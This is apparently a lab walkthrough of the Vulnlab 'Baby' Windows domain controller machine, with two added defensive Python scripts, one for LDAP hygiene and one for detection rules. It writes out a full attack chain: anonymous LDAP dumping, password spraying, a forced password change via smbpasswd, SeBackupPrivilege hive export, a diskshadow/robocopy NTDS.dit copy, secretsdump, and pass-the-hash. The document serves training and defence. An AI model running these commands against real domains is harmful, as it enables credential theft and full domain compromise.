In this walkthrough, we will be going through the Baby room from Vulnlab. This room is rated as Easy on the platform and consists of extensive LDAP enumeration to obtain a potential password. Spraying it reveals a STATUS_PASSWORD_MUST_CHANGE error, which has to be abused to get the initial foothold. For privilege escalation, abuse of SeBackupPrivilege is required to get root. So, let's get started without any delay.
Machine Info:

| Field | Value |
|---|---|
| Title | Baby |
| IP address | 10.10.88.179 |
| Difficulty | Easy |
| OS | Windows |
| Description | Baby is an Easy Windows machine that requires extensive LDAP enumeration to obtain a potential password. Spraying it reveals a STATUS_PASSWORD_MUST_CHANGE error, which has to be abused to get the initial foothold. For privilege escalation, abuse of SeBackupPrivilege is required to get root. |
Enumeration:
- I started off with a regular nmap scan along with an all-TCP-port scan and a UDP scan. Found multiple open ports: 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more.
$ sudo nmap -sV -sC 10.10.88.179
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-20 23:50 IST
Nmap scan report for 10.10.88.179
Host is up (0.25s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-04-20 18:21:39Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-04-20T18:21:49+00:00
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2024-04-19T18:19:35
|_Not valid after:  2024-10-19T18:19:35
|_ssl-date: 2024-04-20T18:22:28+00:00; -1s from scanner time.
5357/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-04-20T18:21:50
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 220.16 seconds

$ sudo nmap -p- -T5 10.10.88.179
[sudo] password for wh1terose:
Sorry, try again.
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-20 23:51 IST
Nmap scan report for 10.10.88.179
Host is up (0.17s latency).
Not shown: 65515 filtered ports
PORT      STATE SERVICE
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5357/tcp  open  wsdapi
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
58870/tcp open  unknown
58959/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 320.17 seconds

$ sudo nmap -sU -T5 10.10.88.179
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-20 23:51 IST
Nmap scan report for 10.10.88.179
Host is up (0.17s latency).
Not shown: 998 open|filtered ports
PORT    STATE SERVICE
123/udp open  ntp
389/udp open  ldap
Nmap done: 1 IP address (1 host up) scanned in 66.98 seconds
- Added hostname to my /etc/hosts file.
PORT 135 (RPC)
- Tried to enumerate usernames using rpcclient but got nothing.
PORT 139/445 (SMB)
- Tried to list shares via null-session authentication but got nothing.
PORT 389 (LDAP)
- Tried anonymous access on LDAP. Got a successful hit and dumped the username list of the domain.
ldapsearch -H ldap://10.10.88.179 -x -b "DC=baby,DC=vl" '(objectClass=User)' "sAMAccountName" | grep sAMAccountName
AS-REP roasting
- On the found usernames, I tried AS-REP roasting to check whether any of them have Kerberos pre-authentication disabled, but had no luck.
- Next, dumped all the domain information of the users via LDAP. Got a password in the description of user Teresa Bell.
ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.179 "*"
Password: BabyStart123!
- To check whether the password is valid, and for which user, I sprayed it against the DC using crackmapexec but got no successful hits.
crackmapexec smb 10.10.88.179 -u usernames -p BabyStart123! --continue-on-success
- Back to enumeration: I looked at the LDAP result again and found that there are more users in the domain than I had already captured.
ldapsearch -x -b "DC=baby,DC=vl" -H ldap://10.10.88.179 "*" | grep "#"
- I sprayed the password again on the newly found usernames. Didn't get a green flag this time either. However, the result for the user "Caroline.Robinson" showed that her password has to be changed.
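As an added defensive check that is not part of the original walkthrough, the following Python script parses ldapsearch LDIF output (the same kind of dump shown above) and reports two things an administrator should hunt for in their own directory: descriptions that carry credential-like text, and accounts whose pwdLastSet is 0 ("user must change password at next logon"), which is one of the states that produces STATUS_PASSWORD_MUST_CHANGE when the current password is presented. The LDIF sample is constructed for this example; the users Jane.Doe and John.Smith, the pwdLastSet values and the keyword/token heuristics are assumptions, not data from the lab.

```python
from __future__ import annotations

import base64
import re

# Constructed sample of ldapsearch LDIF output (made up for this example, not
# captured from the lab). Teresa.Bell and Caroline.Robinson are the users the
# walkthrough names; Jane.Doe and John.Smith are invented. Jane.Doe's
# description is base64-folded ('::'), as ldapsearch emits for values with
# non-ASCII bytes, and John.Smith's is wrapped onto a continuation line.
_FOLDED = base64.b64encode(
    "Contractor \u2013 temp pwd is Summer2024#".encode("utf-8")
).decode("ascii")

SAMPLE_LDIF = f"""\
# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: user
sAMAccountName: Teresa.Bell
description: Set initial password to BabyStart123!
pwdLastSet: 133577459470000000

# Caroline Robinson, it, baby.vl
dn: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
objectClass: user
sAMAccountName: Caroline.Robinson
pwdLastSet: 0

# Jane Doe, dev, baby.vl
dn: CN=Jane Doe,OU=dev,DC=baby,DC=vl
objectClass: user
sAMAccountName: Jane.Doe
description:: {_FOLDED}
pwdLastSet: 133577459470000000

# John Smith, dev, baby.vl
dn: CN=John Smith,OU=dev,DC=baby,DC=vl
objectClass: user
sAMAccountName: John.Smith
description: Helpdesk contact for the
  dev team
pwdLastSet: 133577459470000000
"""

# "attr: value" or "attr:: base64value"; the attribute name never contains ':'.
_ATTR = re.compile(r"^([A-Za-z][\w.;-]*)(::?) ?(.*)$")


def parse_ldif(text: str) -> list[dict[str, list[str]]]:
    """Parse ldapsearch LDIF output into entries (attribute -> list of values).

    Handles '#' comment lines, folded continuation lines (leading space) and
    base64 values ('attr:: ...'); entries are separated by blank lines.
    """
    # Unfold first: a line starting with a space continues the previous line
    # and that single leading space is dropped.
    logical: list[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and logical:
            logical[-1] += raw[1:]
        else:
            logical.append(raw)

    entries: list[dict[str, list[str]]] = []
    current: dict[str, list[str]] = {}
    for line in logical:
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        m = _ATTR.match(line)
        if not m:
            continue
        name, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", errors="replace")
        current.setdefault(name, []).append(value)
    if current:
        entries.append(current)
    return entries


# Words that usually accompany a credential left in a free-text field.
_KEYWORD = re.compile(r"(?i)\b(?:pass(?:word|wd)?|pwd|secret|cred(?:ential)?s?)\b")
# A token of 8+ non-space characters mixing letters, digits and punctuation,
# which is what a password pasted into a description typically looks like.
_TOKEN = re.compile(r"(?=\S*\d)(?=\S*[A-Za-z])(?=\S*[^\w\s])\S{8,}")


def find_description_secrets(entries):
    """Return (sAMAccountName, description) pairs whose description mentions a
    credential keyword or contains a password-looking token."""
    hits = []
    for e in entries:
        name = e.get("sAMAccountName")
        if not name:
            continue  # e.g. the trailing 'search:/result:' pseudo-entry
        for desc in e.get("description", []):
            if _KEYWORD.search(desc) or _TOKEN.search(desc):
                hits.append((name[0], desc))
    return hits


def find_must_change(entries):
    """Return accounts with pwdLastSet = 0 ('user must change password at next
    logon'). Assumption of this example: that flag is one of the states that
    yields STATUS_PASSWORD_MUST_CHANGE when the current password is used."""
    return [e["sAMAccountName"][0] for e in entries
            if e.get("sAMAccountName") and e.get("pwdLastSet") == ["0"]]


if __name__ == "__main__":
    found = parse_ldif(SAMPLE_LDIF)
    for name, desc in find_description_secrets(found):
        print(f"[!] credential-like description on {name}: {desc}")
    for name in find_must_change(found):
        print(f"[i] must-change-password flag set on {name}")
```

Pipe a real dump in with `ldapsearch -x -b "DC=baby,DC=vl" -H ldap://<dc> "*" > dump.ldif` and call `parse_ldif(open("dump.ldif").read())`; the heuristics are deliberately loose, so treat hits as a review list, and remember that an anonymous bind returning these attributes at all is itself a finding worth fixing.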
PORT 5357 (HTTP)
- Next, looked into the running web server but the index page gives a Service Unavailable error.
Exploitation:
- From the password spray against the LDAP-enumerated usernames, I got a "STATUS_PASSWORD_MUST_CHANGE" error. Looked online for this and found that we can change the user's password if RDP is enabled with NLA. I confirmed this using the nmap script.
Resource: https://www.n00py.io/2021/09/resetting-expired-passwords-remotely/
sudo nmap 10.10.88.179 -p 3389 --script rdp-enum-encryption
- I tried to RDP into the server using rdesktop, however the session failed. So, I moved ahead with another technique that leverages smbpasswd.
smbpasswd -r 10.10.88.179 -U Caroline.Robinson
Old SMB password: BabyStart123!
New SMB password: Password@123!
Retype new SMB password: Password@123!
Password changed for user Caroline.Robinson
- Changed the password of user Caroline with the above technique and confirmed it using crackmapexec. Got a green flag now.
crackmapexec smb 10.10.88.179 -u Caroline.Robinson -p "Password@123!"
- Next, I sprayed the creds on the WinRM service and it gave me a "Pwn3d" back.
crackmapexec winrm 10.10.88.179 -u Caroline.Robinson -p "Password@123!"
- Got access via Evil-WinRM and captured the user flag.
Privilege Escalation:
- I ran the below command and checked the groups and privileges assigned to the current user. Found an interesting entry: SeBackupPrivilege and the Backup Operators group.
whoami /all
- Using the assigned privilege, I saved the SAM and SYSTEM hives to the user's Desktop. Next, downloaded both of them to my local machine.
reg save hklm\sam C:\Users\Caroline.Robinson\Desktop\sam
reg save hklm\system C:\Users\Caroline.Robinson\Desktop\system
- Used secretsdump on the downloaded files to dump the contents within them, revealing the Administrator's hash.
secretsdump.py -sam sam -system system LOCAL
Administrator: 8d992faed38128ae85e95fa35868bb43
- Next, I tried to log into the DC with the Administrator hash using the pass-the-hash technique with psexec, but it failed. That means the hash we have is the local Administrator's, not the domain Administrator's.
- So, in order to dump the Domain Admin's hash, we need the NTDS.dit file. Since that file is locked while the directory service is running, we will create a shadow copy of the C: drive and copy the file out of it with robocopy.
# Set up this shit in temp directory
echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
- Once the diskshadow script is set up, we use the diskshadow utility to execute the commands in it and expose the shadow copy as a new drive.
diskshadow.exe /s c:\temp\diskshadow.txt
- Next, copy NTDS.dit from the exposed shadow copy (drive Z:) to C:\temp using robocopy in backup mode (/b).
cd Z:
cd windows
cd ntds
robocopy /b .\ C:\temp NTDS.dit
- Save the SYSTEM hive as system.bak as well.
cd C:\Temp
reg.exe save hklm\system C:\temp\system.bak
- Download the files system.bak and NTDS.dit to our local machine and use secretsdump to dump the hashes within them.
secretsdump.py -ntds ntds.dit -system system.bak LOCAL
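As an added detection example (not from the original walkthrough), the script below runs a few process-creation rules over constructed, SIEM-normalised events that mirror the commands used above (reg save of the SAM/SYSTEM hives, diskshadow driven by a script file, and a backup-mode robocopy naming NTDS.dit) and then correlates the diskshadow-then-robocopy sequence by the same user on the same host, which is the part of the chain that actually takes the directory database. The event shape and field names, the rule names and severities, the 15-minute window, and the benign WS01/svc_backup/Jane.Doe events are all assumptions made for this example.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events in the normalised shape a SIEM would
# produce from Sysmon Event ID 1 / Security Event ID 4688 (made up for this
# example, not real logs). The BABYDC lines mirror the walkthrough's commands;
# WS01, svc_backup and Jane.Doe are invented benign noise.
SAMPLE_EVENTS = [
    {"time": "2024-04-20T18:40:01Z", "host": "BABYDC", "user": "BABY\\Caroline.Robinson",
     "cmdline": "whoami /all"},
    {"time": "2024-04-20T18:41:10Z", "host": "BABYDC", "user": "BABY\\Caroline.Robinson",
     "cmdline": "reg save hklm\\sam C:\\Users\\Caroline.Robinson\\Desktop\\sam"},
    {"time": "2024-04-20T18:41:12Z", "host": "BABYDC", "user": "BABY\\Caroline.Robinson",
     "cmdline": "reg save hklm\\system C:\\Users\\Caroline.Robinson\\Desktop\\system"},
    {"time": "2024-04-20T18:45:30Z", "host": "BABYDC", "user": "BABY\\Caroline.Robinson",
     "cmdline": "diskshadow.exe /s c:\\temp\\diskshadow.txt"},
    {"time": "2024-04-20T18:46:05Z", "host": "BABYDC", "user": "BABY\\Caroline.Robinson",
     "cmdline": "robocopy /b .\\ C:\\temp NTDS.dit"},
    {"time": "2024-04-20T18:46:40Z", "host": "BABYDC", "user": "BABY\\Caroline.Robinson",
     "cmdline": "reg.exe save hklm\\system C:\\temp\\system.bak"},
    {"time": "2024-04-20T19:02:00Z", "host": "WS01", "user": "BABY\\svc_backup",
     "cmdline": "C:\\Program Files\\BackupTool\\backup.exe --nightly"},
    {"time": "2024-04-20T19:05:00Z", "host": "WS01", "user": "BABY\\Jane.Doe",
     "cmdline": "robocopy C:\\Reports D:\\Archive /E"},
]

# Each rule: (name, severity, regex over the command line). The three map to
# the artefacts the Backup Operators abuse above leaves behind: exporting the
# SAM / SYSTEM / SECURITY hives, driving diskshadow from a script, and a
# backup-mode (/b) robocopy that names NTDS.dit.
RULES = [
    ("hive_export", "medium",
     re.compile(r"(?i)\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b")),
    ("shadow_copy_script", "medium",
     re.compile(r"(?i)\bdiskshadow(?:\.exe)?\b.*\s/s\b")),
    ("backup_mode_ntds_copy", "high",
     re.compile(r"(?i)\brobocopy(?:\.exe)?\b(?=.*\s/b\b).*\bntds\.dit\b")),
]


def _ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def detect(events):
    """Run every rule over every event; return one finding per (event, rule) hit."""
    findings = []
    for ev in events:
        for name, severity, rx in RULES:
            if rx.search(ev["cmdline"]):
                findings.append({"rule": name, "severity": severity, **ev})
    return findings


def correlate_ntds_chain(findings, window_minutes: int = 15):
    """Pair a diskshadow script run with a later backup-mode NTDS.dit copy by
    the same user on the same host within the window. That sequence is the
    whole point of the technique, so it is reported as its own high-confidence
    hit; returns (host, user, diskshadow_time, robocopy_time) tuples."""
    window = timedelta(minutes=window_minutes)
    shadows = [f for f in findings if f["rule"] == "shadow_copy_script"]
    copies = [f for f in findings if f["rule"] == "backup_mode_ntds_copy"]
    chains = []
    for s in shadows:
        for c in copies:
            if (s["host"], s["user"]) != (c["host"], c["user"]):
                continue
            gap = _ts(c["time"]) - _ts(s["time"])
            if timedelta(0) <= gap <= window:
                chains.append((s["host"], s["user"], s["time"], c["time"]))
    return chains


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for h in hits:
        print(f"[{h['severity']}] {h['rule']:<22} {h['time']} {h['host']} "
              f"{h['user']}: {h['cmdline']}")
    for host, user, start, end in correlate_ntds_chain(hits):
        print(f"[critical] NTDS.dit extraction chain on {host} by {user} "
              f"between {start} and {end}")
```

The per-command rules alone are noisy on a real estate (legitimate backup jobs also export hives and run diskshadow), which is why the correlated pair, plus the fact that the actor is an interactive Backup Operators member on a domain controller rather than a backup service account, is what should page someone.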
- At last, logged into the DC using Domain Admin hash and captured the root flag to mark the machine as complete.
evil-winrm.rb -i 10.10.88.179 -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d
Conclusion:
So that was "Baby" for you. We started off with a regular nmap scan and found multiple open ports: 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more. Next, we dumped all the domain information of the users via LDAP and got a password in the description of user Teresa Bell. We sprayed the password on the usernames found through LDAP enumeration and got a STATUS_PASSWORD_MUST_CHANGE error. We abused that to change the user's password and get the initial foothold. For privilege escalation, SeBackupPrivilege was abused to dump the NTDS.dit and system.bak files, which were then used to dump the hashes via secretsdump. At last, the dumped admin hash was used to get root. On that note, I will take your leave and will meet you in the next one. Till then, "Happy hacking".